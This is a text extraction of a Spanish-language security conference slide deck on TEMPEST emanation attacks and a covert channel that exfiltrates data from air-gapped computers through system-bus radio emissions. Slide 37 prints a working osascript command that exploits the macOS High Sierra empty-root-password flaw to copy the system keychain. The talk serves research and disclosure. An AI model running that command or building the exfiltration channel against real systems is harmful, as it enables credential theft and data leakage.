Tempest 2.0 Revolution · Tempest 2.0 Revolution 6 Los métodos de la NSA para el espionaje se...

39
#CyberCamp17 Tempest 2.0 Revolution Pedro C. aka s4ur0n (@NN2ed_s4ur0n)

Transcript of Tempest 2.0 Revolution · Tempest 2.0 Revolution 6 Los métodos de la NSA para el espionaje se...

Page 1: Tempest 2.0 Revolution · Tempest 2.0 Revolution 6 Los métodos de la NSA para el espionaje se encuentran clasificados, pero algunos de los estándares de protección se publican

#CyberCamp17

Tempest 2.0 Revolution

Pedro C. aka s4ur0n

(@NN2ed_s4ur0n)

Page 2: Tempest 2.0 Revolution · Tempest 2.0 Revolution 6 Los métodos de la NSA para el espionaje se encuentran clasificados, pero algunos de los estándares de protección se publican

Tempest 2.0 Revolution

class PedroC:

def __init__(self):

self.name = ‘Pedro Candel’

self.nick = ‘s4ur0n’

self.email = ‘s4ur0n@s4ur0n’

self.website = ‘https://www.s4ur0n.com’

self.nickname = ‘@NN2ed_s4ur0n’

self.role = ‘Security Researcher’

self.interest = [ ‘Reversing’, ‘Malware’,

‘Offensive Security’, ‘…’ ]

self.member_of = [ ‘mlw.re’, ‘OWASP’,

‘NetXploit’, ‘…’ ]

2

Page 3: Tempest 2.0 Revolution · Tempest 2.0 Revolution 6 Los métodos de la NSA para el espionaje se encuentran clasificados, pero algunos de los estándares de protección se publican

Tempest

Introducción

Page 4: Tempest 2.0 Revolution · Tempest 2.0 Revolution 6 Los métodos de la NSA para el espionaje se encuentran clasificados, pero algunos de los estándares de protección se publican

Tempest 2.0 Revolution

4

El encubrimiento de canal (covert channel) es una

técnica de evasión que permite a un atacante enviar

información empleando un canal legítimo pero no

previsto para dicho uso.

Por ejemplo, podemos enviar información en las

cabeceras TCP/IP, en los campos de datos no usados,

etc.

¿Qué hay acerca de exfiltrar información en un

equipo completamente aislado donde no existe

comunicación TCP/IP u otros?

Page 5: Tempest 2.0 Revolution · Tempest 2.0 Revolution 6 Los métodos de la NSA para el espionaje se encuentran clasificados, pero algunos de los estándares de protección se publican

Tempest 2.0 Revolution

5

TEMPEST es una especificación de la NSA y una

certificación de la OTAN en referencia al espionaje de

los sistemas de información a través de la fuga de emanaciones, incluyendo las señales de radio (emisiones electromagnéticas), señales eléctricas,

sonidos y vibraciones.

TEMPEST cubre ambos métodos: El espionaje pero

también la protección de los equipos para evitarlo.

Esta última parte se conoce como seguridad de las emisiones (EMSEC) dentro del conjunto de seguridad de las comunicaciones (COMSEC)

Page 6: Tempest 2.0 Revolution · Tempest 2.0 Revolution 6 Los métodos de la NSA para el espionaje se encuentran clasificados, pero algunos de los estándares de protección se publican

Tempest 2.0 Revolution

6

Los métodos de la NSA para el espionaje se encuentran

clasificados, pero algunos de los estándares de protección se publican por la propia NSA o el

Departamento de Defensa.

En los estándares sobre TEMPEST, aparecen por

ejemplo, la distancia de los equipos a las paredes, la

cantidad de blindaje en edificios y equipos, cables de

separación de distancia que transportan materiales clasificados o no clasificados, filtros en cables e

incluso distancia y blindaje entre cables/equipos. El

ruido también puede proteger la información

enmascarando los datos reales.

Page 7: Tempest 2.0 Revolution · Tempest 2.0 Revolution 6 Los métodos de la NSA para el espionaje se encuentran clasificados, pero algunos de los estándares de protección se publican

Tempest 2.0 Revolution

7

La mayoría de TEMPEST se encuentra relacionado

sobre la fuga de emanaciones electromagnéticas,

pero incluye también sonidos o vibraciones.

Por ejemplo, sería posible espiar las pulsaciones de un

usuario empleando el sensor de movimiento del

dispositivo móvil.

Estas fugas de información si se interceptan y analizan, pueden divulgar la información transmitida,

recibida, manejada o procesada por cualquier equipo.

Page 8: Tempest 2.0 Revolution · Tempest 2.0 Revolution 6 Los métodos de la NSA para el espionaje se encuentran clasificados, pero algunos de los estándares de protección se publican

Tempest 2.0 Revolution

8

Los ataques TEMPEST se sustentan sobre el principio de que cualquier dispositivo electrónico emite pequeñas radiaciones electromagnéticas durante su

uso normal.

Esto sucede cada vez que una corriente eléctrica

cambia de voltaje y genera pulsos electromagnéticos que se irradian como ondas de radio invisibles. Estas

ondas pueden alcanzar grandes distancias en

situaciones ideales.

La CPU ahora mismo se encuentra emitiendo y sus

señales pueden ser ampliadas por el bus del sistema a

modo de antena emisora.

Page 9: Tempest 2.0 Revolution · Tempest 2.0 Revolution 6 Los métodos de la NSA para el espionaje se encuentran clasificados, pero algunos de los estándares de protección se publican

Tempest 2.0 Revolution

9

Page 10: Tempest 2.0 Revolution · Tempest 2.0 Revolution 6 Los métodos de la NSA para el espionaje se encuentran clasificados, pero algunos de los estándares de protección se publican

Tempest 2.0 Revolution

10

Es un ataque pasivo en el sentido de que no puede ser detectado ya que el dispositivo no se encuentra

conectado de ninguna manera en nuestro sistema.

No podemos detectar a un tipo en la calle con un equipo

que intente captar las emisiones de radio de nuestro

monitor, cables o de nuestra propia CPU y el bus del sistema.

Page 11: Tempest 2.0 Revolution · Tempest 2.0 Revolution 6 Los métodos de la NSA para el espionaje se encuentran clasificados, pero algunos de los estándares de protección se publican

Ataques Tempest

¿Mito o realidad?

Page 12: Tempest 2.0 Revolution · Tempest 2.0 Revolution 6 Los métodos de la NSA para el espionaje se encuentran clasificados, pero algunos de los estándares de protección se publican

Tempest 2.0 Revolution

12

Source: https://cryptome.org/tempest-cpu.htm

Page 13: Tempest 2.0 Revolution · Tempest 2.0 Revolution 6 Los métodos de la NSA para el espionaje se encuentran clasificados, pero algunos de los estándares de protección se publican

Tempest 2.0 Revolution

13

Source: http://www.erikyyy.de/tempest/

Page 14: Tempest 2.0 Revolution · Tempest 2.0 Revolution 6 Los métodos de la NSA para el espionaje se encuentran clasificados, pero algunos de los estándares de protección se publican

Tempest 2.0 Revolution

14

Source:

http://www.icrobotics.co.uk/wiki/index.php/Turning_the_Raspberry_Pi_Into

_an_FM_Transmitter

Page 15: Tempest 2.0 Revolution · Tempest 2.0 Revolution 6 Los métodos de la NSA para el espionaje se encuentran clasificados, pero algunos de los estándares de protección se publican

Tempest 2.0 Revolution

15

Source(s): https://arxiv.org/abs/1608.03431 &

https://arxiv.org/abs/1606.05915

Page 16: Tempest 2.0 Revolution · Tempest 2.0 Revolution 6 Los métodos de la NSA para el espionaje se encuentran clasificados, pero algunos de los estándares de protección se publican

Tempest 2.0 Revolution

16

Señales del monitor con un SDR:

Source(s): https://github.com/martinmarinov/TempestSDR &

https://www.rtl-sdr.com/tempestsdr-a-sdr-tool-for-eavesdropping-on-

computer-screens-via-unintentionally-radiated-rf/

Page 17: Tempest 2.0 Revolution · Tempest 2.0 Revolution 6 Los métodos de la NSA para el espionaje se encuentran clasificados, pero algunos de los estándares de protección se publican

Tempest Revolution 2.0

Nuevo canal encubierto

Page 18: Tempest 2.0 Revolution · Tempest 2.0 Revolution 6 Los métodos de la NSA para el espionaje se encuentran clasificados, pero algunos de los estándares de protección se publican

Tempest 2.0 Revolution

18

Objetivo:

Emplear un cover channel legítimo y que no pueda ser

anulado en sistemas aislados para provocar fugas intencionadas de información.

Page 19: Tempest 2.0 Revolution · Tempest 2.0 Revolution 6 Los métodos de la NSA para el espionaje se encuentran clasificados, pero algunos de los estándares de protección se publican

Tempest 2.0 Revolution

19

System Bus Radio: proyecto inicial

Source: https://github.com/fulldecent/system-bus-radio

Page 20: Tempest 2.0 Revolution · Tempest 2.0 Revolution 6 Los métodos de la NSA para el espionaje se encuentran clasificados, pero algunos de los estándares de protección se publican

Tempest 2.0 Revolution

20

¿Cómo? Ejecutar instrucciones legítimas en el

equipo que causen radiaciones electromagnéticas por el ruido generado.

Page 21: Tempest 2.0 Revolution · Tempest 2.0 Revolution 6 Los métodos de la NSA para el espionaje se encuentran clasificados, pero algunos de los estándares de protección se publican

Tempest 2.0 Revolution&

Transmitir información a través de una onda portadora de radio.

En amplitud modulada, la amplitud (intensidad de)señal) de la onda portadora varía en proporción a la forma de onda que se transmite.

21

Page 22: Tempest 2.0 Revolution · Tempest 2.0 Revolution 6 Los métodos de la NSA para el espionaje se encuentran clasificados, pero algunos de los estándares de protección se publican

Tempest 2.0 Revolution

22

Page 23: Tempest 2.0 Revolution · Tempest 2.0 Revolution 6 Los métodos de la NSA para el espionaje se encuentran clasificados, pero algunos de los estándares de protección se publican

Tempest 2.0 Revolution

23

Anteriormente se realizaba en CODIGO MORSE empleando una serie de transformaciones.

Basados en el mismo principio, podemos modular

tonos de audio que permiten una mayor velocidad conservando la integridad de la información que se

transmite.

Page 24: Tempest 2.0 Revolution · Tempest 2.0 Revolution 6 Los métodos de la NSA para el espionaje se encuentran clasificados, pero algunos de los estándares de protección se publican

Tempest 2.0 Revolution

24

Page 25: Tempest 2.0 Revolution · Tempest 2.0 Revolution 6 Los métodos de la NSA para el espionaje se encuentran clasificados, pero algunos de los estándares de protección se publican

Tempest 2.0 Revolution

25

Page 26: Tempest 2.0 Revolution · Tempest 2.0 Revolution 6 Los métodos de la NSA para el espionaje se encuentran clasificados, pero algunos de los estándares de protección se publican

Tempest 2.0 Revolution

26

Page 27: Tempest 2.0 Revolution · Tempest 2.0 Revolution 6 Los métodos de la NSA para el espionaje se encuentran clasificados, pero algunos de los estándares de protección se publican

Tempest 2.0 Revolution

27

Símbolos. 16QAM vs 16PSK. BER. Codificación, constelación. Código gris.

Page 28: Tempest 2.0 Revolution · Tempest 2.0 Revolution 6 Los métodos de la NSA para el espionaje se encuentran clasificados, pero algunos de los estándares de protección se publican

Tempest 2.0 Revolution

28

Page 29: Tempest 2.0 Revolution · Tempest 2.0 Revolution 6 Los métodos de la NSA para el espionaje se encuentran clasificados, pero algunos de los estándares de protección se publican

Tempest 2.0 Revolution

29

char MSB / LSB a = 61 0x6 0x1

Page 30: Tempest 2.0 Revolution · Tempest 2.0 Revolution 6 Los métodos de la NSA para el espionaje se encuentran clasificados, pero algunos de los estándares de protección se publican

Tempest 2.0 Revolution

30

Page 31: Tempest 2.0 Revolution · Tempest 2.0 Revolution 6 Los métodos de la NSA para el espionaje se encuentran clasificados, pero algunos de los estándares de protección se publican

Tempest 2.0 Revolution Si no pudieramos dar solución a

estos problemas, realmente

estaríamos en problemas

Page 32: Tempest 2.0 Revolution · Tempest 2.0 Revolution 6 Los métodos de la NSA para el espionaje se encuentran clasificados, pero algunos de los estándares de protección se publican

Tempest 2.0 Revolution

32

Houston, we have a problem

Transmisiones en Broadcast L

Criptoanálisis de las frecuencias L

Ficheros binarios L

Conjunto limitado de caracteres L

Page 33: Tempest 2.0 Revolution · Tempest 2.0 Revolution 6 Los métodos de la NSA para el espionaje se encuentran clasificados, pero algunos de los estándares de protección se publican

Tempest 2.0 Revolution

33

Cifrado

Extracción de la clave pública

Generación de un IV

Cifrado con el IV generado del

fichero en modo AES256-CBC

Cifrado del IV con la clave pública

(RSA-4096)

Page 34: Tempest 2.0 Revolution · Tempest 2.0 Revolution 6 Los métodos de la NSA para el espionaje se encuentran clasificados, pero algunos de los estándares de protección se publican

Tempest 2.0 Revolution

34

Codificación

Codificación en Base64

Page 35: Tempest 2.0 Revolution · Tempest 2.0 Revolution 6 Los métodos de la NSA para el espionaje se encuentran clasificados, pero algunos de los estándares de protección se publican

Tempest 2.0 Revolution

35

Normalización

Normalización (sustituciones)

Cambio Sustitución Morse Code

Minúsculas Insertar dos puntos : &

Carácter_a_MAYS(char)

- - - . . . + toupper(char)

Signo (+) Menos (-) - . . . . -

Espacio entre

ficheros

Apóstrofe (´) . - - - - .

Page 36: Tempest 2.0 Revolution · Tempest 2.0 Revolution 6 Los métodos de la NSA para el espionaje se encuentran clasificados, pero algunos de los estándares de protección se publican

Tempest 2.0 Revolution

36

Recepción

• Pyaudio http://people.csail.mit.edu/hubert/pyaudio/

• Scipy.fftpack https://docs.scipy.org/doc/scipy/reference/fftpack.

html

Page 37: Tempest 2.0 Revolution · Tempest 2.0 Revolution 6 Los métodos de la NSA para el espionaje se encuentran clasificados, pero algunos de los estándares de protección se publican

37

OSX High Sierra EPIC fail

/usr/bin/osascript -e 'do shell script "cp /Library/Keychains/System.keychain /tmp/kc.tmp" user name "root" password "" with

administrator privileges’

Note: Passwords stored in the iCloud keychain are

encrypted and stored on your computer and can’t be copied

Tempest 2.0 Revolution&

Page 38: Tempest 2.0 Revolution · Tempest 2.0 Revolution 6 Los métodos de la NSA para el espionaje se encuentran clasificados, pero algunos de los estándares de protección se publican

Tempest 2.0 Revolution

38

Page 39: Tempest 2.0 Revolution · Tempest 2.0 Revolution 6 Los métodos de la NSA para el espionaje se encuentran clasificados, pero algunos de los estándares de protección se publican

Gracias por su atención